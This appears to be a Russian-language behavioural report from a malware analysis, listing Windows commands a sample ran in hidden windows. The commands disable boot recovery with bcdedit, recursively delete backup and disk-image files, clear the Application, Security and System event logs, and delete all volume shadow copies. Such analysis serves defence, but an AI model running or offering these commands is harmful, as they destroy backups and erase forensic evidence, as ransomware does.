Техническая информация
- Компонент восстановления системы (SR)
- '<SYSTEM32>\cmd.exe' /C bcdedit /set {default} recoveryenabled No (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /C bcdedit /set {default} bootstatuspolicy ignoreallfailures (со скрытым окном)
- '<SYSTEM32>\bcdedit.exe' /set {default} bootstatuspolicy ignoreallfailures
- '<SYSTEM32>\cmd.exe' /C del /s /f /q C:\*.vhd (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /C del /s /f /q C:\*.bak (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /C wevtutil cl Application && wevtutil cl Security && wevtutil cl System (со скрытым окном)
- '<SYSTEM32>\wevtutil.exe' cl Application
- '<SYSTEM32>\wevtutil.exe' cl Security
- '<SYSTEM32>\wevtutil.exe' cl System
- '<SYSTEM32>\cmd.exe' /C vssadmin delete shadows /all /quiet (со скрытым окном)